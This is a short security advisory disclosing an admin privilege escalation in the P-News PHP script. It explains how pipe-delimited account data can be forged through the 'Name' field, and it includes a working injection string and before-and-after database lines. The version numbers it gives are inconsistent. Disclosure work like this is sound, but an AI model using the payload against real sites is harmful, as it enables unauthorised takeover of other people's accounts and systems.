P-News versions 1.6 is vulnerable to a privilege escalation attack by allowing a remote attacker to populate strings with the | used for delimiting data stored about the account.
03e639c42ea8d778ec18f23eea9b43452efd029c4da46aeeeead26e57884221b
Admin Access Vulnerability in P-News 1.6
Url: http://www.ppopn.net
It is possible to gain admin access if you possess a 'Member'
account due to a flaw in the 'p-news.php' file.
You can inject an entire arbitrary account, including all the fields, into
the 'Name' field, which will push all the restricting details to the far end
of the data string, not allowing them to be included in the login process.
Below is an example of a normal database:
Admin|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|p-news-admin@ppopn.net|-|
Peter|-|179ad45c6ce2cb97cf1029e212046e81|-|2|-|peter@aol.com|-|
Notice the '0' denotes an 'admin' account, and the '2' denotes a 'member'
account.
Injecting:
Peter|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|none@nowhere.com|-|
Into the 'Name' field in the edit account information section will give the
malicious user admin privileges.
The database then looks like:
Admin|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|p-news-admin@ppopn.net|-|
Peter|-|21232f297a57a5a743894a0e4a801fc3|-|0|-|none@nowhere.com|-||-|179ad45c6ce2cb97cf1029e212046e81|-|2|-|peter@aol.com|-|
================================================================
Operating system and servicepack level:
Windows/Linux/Unix + PHP
Software:
P-News 1.16 (possibly 1.17)
Under what circumstances the vulnerability was discovered:
Under a vulnerability search.
If the vendor has been notified:
The vendor has not been notified because he does not speak English, so much
confusion may arise.
How to contact you for further information:
I can always be reached at peter4020@hotmail.com
Please credit this find to:
Peter Winter-Smith of Team UEC
Thank you for your time,
-Peter
_________________________________________________________________
Sign-up for a FREE BT Broadband connection today!
http://www.msn.co.uk/specials/btbroadband